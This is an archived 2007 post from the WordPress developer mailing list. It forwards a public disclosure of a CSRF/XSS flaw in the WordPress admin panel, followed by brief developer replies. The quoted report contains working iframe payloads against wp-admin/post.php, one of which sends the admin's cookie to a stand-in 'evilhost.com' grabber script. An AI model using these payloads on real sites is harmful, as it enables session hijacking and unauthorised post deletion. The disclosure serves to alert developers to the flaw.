[wp-hackers] FW: [Full-disclosure] WordPress AdminPanel CSRF/XSS - 0day

howard chen howachen at gmail.com
Tue Feb 27 16:47:25 GMT 2007


can WP allow detete/update action thru HTTP Get?


On 2/27/07, Dr. Mike Wendell <theapparatus at gmail.com> wrote:
> *chuckle* And folks wonder why iframes get stripped out in wpmu and wp.com.
>
> On 2/26/07, Ross M. W. Bennetts <ross.bennetts at une.edu.au> wrote:
> > Exploit:
> >
> > Cookie in an Alert Box:
> > <iframe width=600 height=400
> > src='http://example.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript
> > %3Ealert(document.cookie)%3C/script%3E%3Clol=%27'></iframe>
> >
> > Cookie send to an Evil Host:
> > <iframe width=600 height=400
> > src='http://example.com/wp-admin/post.php?action=delete&post=%27%3E%3Cscript
> > %3Eimage=document.createElement(%27img%27);image.src=%27http://evilhost.com/
> > datagrabber.php?cookie=%27%2bdocument.cookie;%3C/script%3E%3Clol=%27'></ifra
> > me>
> --
> Blog: http://drmikessteakdinner.com
> Kim Possible: Remixed: http://kimpossibleremixed.com
> Get your own free hosted WordPress Blog today: http://daria.be
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers
>


More information about the wp-hackers mailing list